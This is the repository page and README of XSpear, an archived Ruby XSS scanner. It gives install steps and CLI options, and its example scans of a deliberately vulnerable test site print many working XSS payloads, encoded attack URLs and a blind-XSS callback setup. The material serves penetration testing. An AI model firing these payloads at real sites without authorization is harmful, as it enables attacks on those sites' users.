hahwul
XSpear
Ruby

πŸ”± Powerfull XSS Scanning and Parameter analysis tool&gem

Last updated Jul 8, 2026
1.4k
Stars
241
Forks
21
Issues
+3
Stars/day
Attention Score
93
Language breakdown
No language data available.
β–Έ Files click to expand
README

XSpear

XSpear is XSS Scanner on ruby gems

[!IMPORTANT]
XSpear Repository Archived
>
This repository has been archived and is now read-only.
XSpear is no longer actively maintained.
>
### Try Dalfox instead πŸŒ™πŸ¦Š
A faster, more powerful XSS scanner with advanced features.
>
β†’ https://github.com/hahwul/dalfox

Key features

  • Pattern matching based XSS scanning
  • Detect alert confirm prompt event on headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected(or all) params
+ Reflected Params + All params(for blind xss, anytings) + Filtered test event handler HTML tag Special Char Useful code + Testing custom payload for only you!
  • Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
  • Dynamic/Static Analysis
+ Find SQL Error pattern + Analysis Security headers(CSP HSTS X-frame-options, XSS-protection etc.. ) + Analysis Other headers..(Server version, Content-Type, etc...) + XSS Testing to URI Path + Testing Only Parameter Analysis (aka no-XSS mode)
  • Scanning from Raw file(Burp suite, ZAP Request)
  • XSpear running on ruby code(with Gem library)
  • Show table base cli-report and filtered rule, testing raw query(url)
  • Testing at selected parameters
  • Support output format cli json html
+ cli + json + html
  • Support Verbose level (0~3)
+ 0: quite mode(only result) + 1: show scanning status(default) + 2: show scanning logs + 3: show detail log(req/res)
  • Support custom callback code to any test various attack vectors
  • Support Config file

Installation

Install it yourself as:

$ gem install XSpear

Or install it yourself as (local file / download latest ):

$ gem install XSpear-{version}.gem Add this line to your application's Gemfile:

gem 'XSpear'

And then execute:

$ bundle

Dependency gems

colorize selenium-webdriver terminal-table progress_bar
If you configured it to install automatically in the Gem library, but it behaves abnormally, install it with the following command.
$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar

Usage on cli

Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json

[ Options ] -u, --url=target_URL [required] Target Url -d, --data=POST Body [optional] POST Method Body data -a, --test-all-params [optional] test to all params(include not reflected) --no-xss [optional] no testing xss, only parameters analysis --headers=HEADERS [optional] Add HTTP Headers --cookie=COOKIE [optional] Add Cookie --custom-payload=FILENAME [optional] Load custom payload json file --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt) -p, --param=PARAM [optional] Test paramters -b, --BLIND=URL [optional] Add vector of Blind XSS + with XSS Hunter, ezXSS, HBXSS, etc... + e.g : -b https://hahwul.xss.ht -t, --threads=NUMBER [optional] thread , default: 10 -o, --output=FORMAT [optional] Output format (cli , json) -c, --config=FILENAME [optional] Using config.json -v, --verbose=0~3 [optional] Show log depth + v=0 : quite mode(only result) + v=1 : show scanning status(default) + v=2 : show scanning logs + v=3 : show detail log(req/res) -h, --help Prints this help --version Show XSpear version --update Show how to update

Result types

  • (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
  • (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
  • (L)OW: Low level issue
  • (M)EDIUM: medium level issue
  • (H)IGH: high level issue

Verbose Mode

[0] quite mode(show only result)
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0 you see report
[1] show progress bar (default)
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1 [*] analysis request.. [*] used test-reflected-params mode(default) [*] creating a test query [for reflected 2 param + blind XSS ] [*] test query generation is complete. [249 query] [*] starting XSS Scanning. [10 threads]

[#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s] ... you see report

[2] show scanning logs
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2 [*] analysis request.. [I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern] [-] [22:42:41] [200/OK] 'STATIC' not reflected [-] [22:42:41] [200/OK] 'cat' not reflected  [I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter] [*] used test-reflected-params mode(default) [*] creating a test query [for reflected 2 param + blind XSS ] [*] test query generation is complete. [249 query] [*] starting XSS Scanning. [10 threads] [I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern] [-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)> [-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)> [H] [22:42:54] [200/OK] reflected [param: cat][reflected XSS Code] [V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>] ... you see report
[3] show scanning detail logs
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3 [*] analysis request.. [-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url [ Request ] {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["/"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]} [ Response ] {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]} [-] [22:56:21] [200/OK] 'STATIC' not reflected [-] [22:56:21] [200/OK] cat=123rEfe6 in url ... [*] used test-reflected-params mode(default) [*] creating a test query [for reflected 2 param + blind XSS ] [*] test query generation is complete. [249 query] [*] starting XSS Scanning. [10 threads] ... [ Request ] {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["/"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]} [ Response ] {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]} [H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code] ... you see report

Case by Case

Scanning XSS
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

Only JSON output

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0

Set scanning thread

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

Testing at selected parameters

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

Testing at all parameters
(This option is tested with or without reflection.)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a

Testing Only parameter analysis (aka no-xss mode)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss

Testing blind xss(all params)
(Should be used as much as possible because Blind XSS is everywhere)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a

Set your blind xss host. <-b options>

Testing custom payload

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json
in custom_payload.json file
[   {     "payload":"<svg/onload=alert(1)>",     "callback":"P1",     "descript":"blahblah~"   },   {     "payload":"<svg/onload=alert(1)>",     "callback":"P2",     "descript":"blahblah~"   },   {     "payload":"<>",     "callback":"P1",     "descript":"blahblah~"   } ]

for Pipeline

$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

-u : target

-b : testing blind xss

-a : test all params(test to not reflected param)

-v : verbose, not showing logs at value 1.

-o : output optios, json!

result json data
{
    "starttime": "2019-12-25 00:02:58 +0900",
    "endtime": "2019-12-25 00:03:31 +0900",
    "issue_count": 25,
    "issue_list": [{
        "id": 0,
        "type": "INFO",
        "issue": "DYNAMIC ANALYSIS",
        "method": "GET",
        "param": "cat",
        "payload": "XsPeaR\"",
        "description": "Found SQL Error Pattern"
    }, {
        "id": 1,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Found Server: nginx/1.4.1"
    }, {
        "id": 2,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not set HSTS"
    }, {
        "id": 3,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Content-Type: text/html"
    }, {
        "id": 4,
        "type": "LOW",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set X-Frame-Options"
    }, {
        "id": 5,
        "type": "MIDUM",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set CSP"
    }, {
        "id": 6,
        "type": "INFO",
        "issue": "REFLECTED",
        "method": "GET",
        "param": "cat",
        "payload": "rEfe6",
        "description": "reflected parameter"
    }, {
        "id": 7,
        "type": "INFO",
        "issue": "FILERD RULE",
        "method": "GET",
        "param": "cat",
        "payload": "onhwul=64",
        "description": "not filtered event handler on{any} pattern"
    }
....
, {
        "id": 17,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<audio src onloadstart=alert(45)>",
        "description": "reflected HTML5 XSS Code"
    }, {
        "id": 18,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<keygen autofocus onfocus=alert(45)>",
        "description": "reflected onfocus XSS Code"
 ....
    }, {
        "id": 24,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<marquee onstart=alert(45)>",
        "description": "triggered <marquee onstart=alert(45)>"
    }]
}
(Items marked as triggered are actually payloads that work in the browser.)

XSpear on Burpsuite
https://github.com/hahwul/XSpear/tree/master/forBurp

etc...

Sample log

Scanning XSS
xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
(()\  /())  )    ))\ ( /(  )(
_(()())  /(/(   /(())(_))(()\
\ \/ // _|(()\ ()) (()  ((_)
 &gt;  &lt; \_ \| &#39; \)/ -)/  || '_|
//\\|/| ./ \|\,|||    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.4.0 ]
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 1 param ]
[*] test query generation is complete. [251 query]
[*] starting XSS Scanning. [10 threads]
...snip...
[*] finish scan. the report is being generated..
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
|                                                            [ XSpear report ]                                                            |
|                              http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip)                              |
|                                 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues.                                  |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                                | DESCRIPTION                                   |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| 0  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Found Server: nginx/1.4.1                     |
| 1  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not set HSTS                                  |
| 2  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Content-Type: text/html                       |
| 3  | LOW   | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not Set X-Frame-Options                       |
| 4  | MIDUM | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not Set CSP                                   |
| 5  | INFO  | DYNAMIC ANALYSIS | GET    | cat   | XsPeaR"                                | Found SQL Error Pattern                       |
| 6  | INFO  | REFLECTED        | GET    | cat   | rEfe6                                  | reflected parameter                           |
| 7  | INFO  | FILERD RULE      | GET    | cat   | onhwul=64                              | not filtered event handler on{any} pattern    |
| 8  | HIGH  | XSS              | GET    | cat   |              | reflected XSS Code                            |
| 9  | HIGH  | XSS              | GET    | cat   | <marquee onstart=alert(45)>            | reflected HTML5 XSS Code                      |
| 10 | HIGH  | XSS              | GET    | cat   | <details/open/>    | reflected HTML5 XSS Code                      |
| 11 | HIGH  | XSS              | GET    | cat   | <select autofocus onfocus=alert(45)>   | reflected onfocus XSS Code                    |
| 12 | HIGH  | XSS              | GET    | cat   | <input autofocus onfocus=alert(45)>    | reflected onfocus XSS Code                    |
| 13 | HIGH  | XSS              | GET    | cat   | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code                    |
| 14 | HIGH  | XSS              | GET    | cat   | <audio src onloadstart=alert(45)>      | reflected HTML5 XSS Code                      |
| 15 | HIGH  | XSS              | GET    | cat   | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code                      |
| 16 | HIGH  | XSS              | GET    | cat   | "><iframe/src=alert(45)>    | reflected XSS Code                            |
| 17 | HIGH  | XSS              | GET    | cat   | <video/poster/onerror=alert(45)>       | reflected HTML5 XSS Code                      |
| 18 | HIGH  | XSS              | GET    | cat   | <keygen autofocus onfocus=alert(45)>   | reflected onfocus XSS Code                    |
| 19 | VULN  | XSS              | GET    | cat   |              | triggered           |
| 20 | HIGH  | XSS              | GET    | cat   | <marquee onstart=alert(45)>            | triggered <marquee onstart=alert(45)>         |
| 21 | HIGH  | XSS              | GET    | cat   | <details/open/>    | triggered <details/open/> |
| 22 | HIGH  | XSS              | GET    | cat   | <audio src onloadstart=alert(45)>      | triggered <audio src onloadstart=alert(45)>   |
| 23 | VULN  | XSS              | GET    | cat   | '"><svg/onload=alert(45)>              | triggered <svg/onload=alert(45)>              |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
< Available Objects >
[cat] param
 + Available Special Char:  ( \ &#39; { ) } [ : $ ]
 + Available Event Handler: &quot;onBeforeEditFocus&quot;,&quot;onAbort&quot;,&quot;onActivate&quot;,&quot;onAfterUpdate&quot;,&quot;onBeforeCopy&quot;,&quot;onAfterPrint&quot;,&quot;onBeforeActivate&quot;,&quot;onBeforeCut&quot;,&quot;onBeforeDeactivate&quot;,&quot;onChange&quot;,&quot;onBeforePrint&quot;,&quot;onBounce&quot;,&quot;onBeforeUnload&quot;,&quot;onCellChange&quot;,&quot;onBeforePaste&quot;,&quot;onClick&quot;,&quot;onBegin&quot;,&quot;onBlur&quot;,&quot;onBeforeUpdate&quot;,&quot;onDataSetChanged&quot;,&quot;onCut&quot;,&quot;onDblClick&quot;,&quot;onCopy&quot;,&quot;onContextMenu&quot;,&quot;onDataSetComplete&quot;,&quot;onDeactivate&quot;,&quot;onDataAvailable&quot;,&quot;onControlSelect&quot;,&quot;onDrag&quot;,&quot;onDrop&quot;,&quot;onDragEnd&quot;,&quot;onEnd&quot;,&quot;onDragLeave&quot;,&quot;onDragStart&quot;,&quot;onDragOver&quot;,&quot;onDragEnter&quot;,&quot;onDragDrop&quot;,&quot;onError&quot;,&quot;onErrorUpdate&quot;,&quot;onFinish&quot;,&quot;onFilterChange&quot;,&quot;onKeyPress&quot;,&quot;onHelp&quot;,&quot;onFocus&quot;,&quot;onInput&quot;,&quot;onHashChange&quot;,&quot;onKeyDown&quot;,&quot;onFocusIn&quot;,&quot;onFocusOut&quot;,&quot;onMessage&quot;,&quot;onMouseDown&quot;,&quot;onLoad&quot;,&quot;onLayoutComplete&quot;,&quot;onMouseEnter&quot;,&quot;onLoseCapture&quot;,&quot;onloadstart&quot;,&quot;onMediaError&quot;,&quot;onKeyUp&quot;,&quot;onMediaComplete&quot;,&quot;onMouseOver&quot;,&quot;onMouseWheel&quot;,&quot;onMove&quot;,&quot;onMouseMove&quot;,&quot;onMouseOut&quot;,&quot;onOffline&quot;,&quot;onMoveStart&quot;,&quot;onMouseLeave&quot;,&quot;onMouseUp&quot;,&quot;onMoveEnd&quot;,&quot;onPropertyChange&quot;,&quot;onOnline&quot;,&quot;onPause&quot;,&quot;onPaste&quot;,&quot;onReadyStateChange&quot;,&quot;onRedo&quot;,&quot;onProgress&quot;,&quot;onPopState&quot;,&quot;onOutOfSync&quot;,&quot;onRepeat&quot;,&quot;onResume&quot;,&quot;onRowExit&quot;,&quot;onReset&quot;,&quot;onResizeEnd&quot;,&quot;onRowsEnter&quot;,&quot;onResizeStart&quot;,&quot;onReverse&quot;,&quot;onRowDelete&quot;,&quot;onRowInserted&quot;,&quot;onResize&quot;,&quot;onStop&quot;,&quot;onSeek&quot;,&quot;onSelect&quot;,&quot;onSubmit&quot;,&quot;onStorage&quot;,&quot;onStart&quot;,&quot;onScroll&quot;,&quot;onSelectionChange&quot;,&quot;onSyncRestored&quot;,&quot;onSelectStart&quot;,&quot;onUnload&quot;,&quot;ontouchstart&quot;,&quot;onbeforescriptexecute&quot;,&quot;onTimeError&quot;,&quot;onURLFlip&quot;,&quot;ontouchmove&quot;,&quot;ontouchend&quot;,&quot;onTrackChange&quot;,&quot;onUndo&quot;,&quot;onafterscriptexecute&quot;,&quot;onpointermove&quot;,&quot;onpointerleave&quot;,&quot;onpointerup&quot;,&quot;onpointerover&quot;,&quot;onpointerdown&quot;,&quot;onpointerenter&quot;,&quot;onloadstart&quot;,&quot;onloadend&quot;,&quot;onpointerout&quot;
 + Available HTML Tag: &quot;script&quot;,&quot;img&quot;,&quot;embed&quot;,&quot;video&quot;,&quot;audio&quot;,&quot;meta&quot;,&quot;style&quot;,&quot;frame&quot;,&quot;iframe&quot;,&quot;svg&quot;,&quot;object&quot;,&quot;frameset&quot;,&quot;applet&quot;
 + Available Useful Code: &quot;document.cookie&quot;,&quot;document.location&quot;,&quot;window.location&quot;

&lt; Raw Query &gt; [0] http://testphp.vulnweb.com/listproducts.php?- ..snip.. [19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&amp;zfdfasdf=124fffff [20] http://testphp.vulnweb.com/listproducts.php?cat=123%22&#39;%3E%3Cmarquee%20onstart=alert(45)%3E&amp;zfdfasdf=124fffff [21] http://testphp.vulnweb.com/listproducts.php?cat=123%22&#39;%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&amp;zfdfasdf=124fffff [22] http://testphp.vulnweb.com/listproducts.php?cat=123%22&#39;%3E%3Caudio%20src%20onloadstart=alert(45)%3E&amp;zfdfasdf=124fffff [23] http://testphp.vulnweb.com/listproducts.php?cat=123&#39;%22%3E%3Csvg/onload=alert(45)%3E&amp;zfdfasdf=124fffff

...snip...</code></pre>

to JSON <pre><code class="lang-">$ xspear -u &quot;http://testphp.vulnweb.com/listproducts.php?cat=123&amp;zfdfasdf=124fffff&quot; -v 1 -o json {&quot;starttime&quot;:&quot;2019-08-14 23:58:12 +0900&quot;,&quot;endtime&quot;:&quot;2019-08-14 23:58:44 +0900&quot;,&quot;issuecount&quot;:24,&quot;issuelist&quot;:[{&quot;id&quot;:0,&quot;type&quot;:&quot;INFO&quot;,&quot;issue&quot;:&quot;STATIC ANALYSIS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;-&quot;,&quot;payload&quot;:&quot;&lt;original query&gt;&quot;,&quot;description&quot;:&quot;Found Server: nginx/1.4.1&quot;},{&quot;id&quot;:1,&quot;type&quot;:&quot;INFO&quot;,&quot;issue&quot;:&quot;STATIC ANALYSIS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;-&quot;,&quot;payload&quot;:&quot;&lt;original query&gt;&quot;,&quot;description&quot;:&quot;Not set HSTS&quot;},{&quot;id&quot;:2,&quot;type&quot;:&quot;INFO&quot;,&quot;issue&quot;:&quot;STATIC ANALYSIS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;-&quot;,&quot;payload&quot;:&quot;&lt;original query&gt;&quot;,&quot;description&quot;:&quot;Content-Type: text/html&quot;},{&quot;id&quot;:3,&quot;type&quot;:&quot;LOW&quot;,&quot;issue&quot;:&quot;STATIC ANALYSIS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;-&quot;,&quot;payload&quot;:&quot;&lt;original query&gt;&quot;,&quot;description&quot;:&quot;Not Set X-Frame-Options&quot;},{&quot;id&quot;:4,&quot;type&quot;:&quot;MIDUM&quot;,&quot;issue&quot;:&quot;STATIC ANALYSIS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;-&quot;,&quot;payload&quot;:&quot;&lt;original query&gt;&quot;,&quot;description&quot;:&quot;Not Set CSP&quot;},{&quot;id&quot;:5,&quot;type&quot;:&quot;INFO&quot;,&quot;issue&quot;:&quot;DYNAMIC ANALYSIS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;XsPeaR\&quot;&quot;,&quot;description&quot;:&quot;Found SQL Error Pattern&quot;},{&quot;id&quot;:6,&quot;type&quot;:&quot;INFO&quot;,&quot;issue&quot;:&quot;REFLECTED&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;rEfe6&quot;,&quot;description&quot;:&quot;reflected parameter&quot;},{&quot;id&quot;:7,&quot;type&quot;:&quot;INFO&quot;,&quot;issue&quot;:&quot;FILERD RULE&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;onhwul=64&quot;,&quot;description&quot;:&quot;not filtered event handler on{any} pattern&quot;},{&quot;id&quot;:8,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&quot;,&quot;description&quot;:&quot;reflected XSS Code&quot;},{&quot;id&quot;:9,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;textarea autofocus onfocus=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected onfocus XSS Code&quot;},{&quot;id&quot;:10,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;video/poster/onerror=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected HTML5 XSS Code&quot;},{&quot;id&quot;:11,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;audio src onloadstart=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected HTML5 XSS Code&quot;},{&quot;id&quot;:12,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;details/open/ontoggle=\&quot;alert45\&quot;&gt;&quot;,&quot;description&quot;:&quot;reflected HTML5 XSS Code&quot;},{&quot;id&quot;:13,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;select autofocus onfocus=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected onfocus XSS Code&quot;},{&quot;id&quot;:14,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;marquee onstart=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected HTML5 XSS Code&quot;},{&quot;id&quot;:15,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;input autofocus onfocus=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected onfocus XSS Code&quot;},{&quot;id&quot;:16,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;\&quot;&gt;&lt;iframe/src=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected XSS Code&quot;},{&quot;id&quot;:17,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;meter onmouseover=alert(45)&gt;0&lt;/meter&gt;&quot;,&quot;description&quot;:&quot;reflected HTML5 XSS Code&quot;},{&quot;id&quot;:18,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;keygen autofocus onfocus=alert(45)&gt;&quot;,&quot;description&quot;:&quot;reflected onfocus XSS Code&quot;},{&quot;id&quot;:19,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;audio src onloadstart=alert(45)&gt;&quot;,&quot;description&quot;:&quot;triggered &lt;audio src onloadstart=alert(45)&gt;&quot;},{&quot;id&quot;:20,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;marquee onstart=alert(45)&gt;&quot;,&quot;description&quot;:&quot;triggered &lt;marquee onstart=alert(45)&gt;&quot;},{&quot;id&quot;:21,&quot;type&quot;:&quot;HIGH&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&lt;details/open/ontoggle=\&quot;alert(45)\&quot;&gt;&quot;,&quot;description&quot;:&quot;triggered &lt;details/open/ontoggle=\&quot;alert(45)\&quot;&gt;&quot;},{&quot;id&quot;:22,&quot;type&quot;:&quot;VULN&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&quot;,&quot;description&quot;:&quot;triggered &quot;},{&quot;id&quot;:23,&quot;type&quot;:&quot;VULN&quot;,&quot;issue&quot;:&quot;XSS&quot;,&quot;method&quot;:&quot;GET&quot;,&quot;param&quot;:&quot;cat&quot;,&quot;payload&quot;:&quot;&#39;\&quot;&gt;&lt;svg/onload=alert(45)&gt;&quot;,&quot;description&quot;:&quot;triggered &lt;svg/onload=alert(45)&gt;&quot;}]}</code></pre>

Usage on ruby code

<pre><code class="lang-ruby">require &#39;XSPear&#39;

Set options

options = {} options[&#39;thread&#39;] = 30 options[&#39;cookie&#39;] = &quot;data=123&quot; options[&#39;blind&#39;] = &quot;https://hahwul.xss.ht&quot; options[&#39;output&#39;] = json

Create XSpear object with url, options

s = XspearScan.new &quot;https://www.hahwul.com?target_url&quot;, options

Scanning

s.run result = s.report.to_json r = JSON.parse result</code></pre>

Add Scanning Module

1) Add
makeQueryPattern <pre><code class="lang-ruby">makeQueryPattern(&#39;type&#39;, &#39;query,&#39;, &#39;pattern&#39;, &#39;category&#39;, &quot;description&quot;, &quot;callback funcion&quot;)

type: f(ilterd?) r(eflected?) x(ss?)

category i(nfo) v(uln) l(ow) m(edium) h(igh)

e.g

makeQueryPattern(&#39;f&#39;, &#39;XsPeaR,&#39;, &#39;XsPeaR,&#39;, &#39;i&#39;, &quot;not filtered &quot;+&quot;,&quot;.blue, CallbackStringMatch)</code></pre>

2) if other callback, write callback class override ScanCallbackFunc e.g <pre><code class="lang-ruby">class CallbackStringMatch &lt; ScanCallbackFunc def run if @response.body.include? @query [true, &quot;reflected #{@query}&quot;] else [false, &quot;not reflected #{@query}&quot;] end end end</code></pre>

Parent class(ScanCallbackFunc) <pre><code class="lang-ruby">class ScanCallbackFunc() def initialize(url, method, query, response) @url = url @method = method @query = query @response = response # self.run end def run # override end end</code></pre>

Common Callback Class

  • CallbackXSSSelenium
  • CallbackErrorPatternMatch
  • CallbackCheckHeaders
  • CallbackStringMatch
  • CallbackNotAdded
  • etc...

Update

if nomal user <pre><code class="lang-">$ gem update XSpear</code></pre>

if developers (soft) <pre><code class="lang-">$ git pull -v</code></pre> if develpers (hard) <pre><code class="lang-">$ git reset --hard HEAD; git pull -v</code></pre>

RubyDoc

https://www.rubydoc.info/gems/XSpear/

Development

After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.

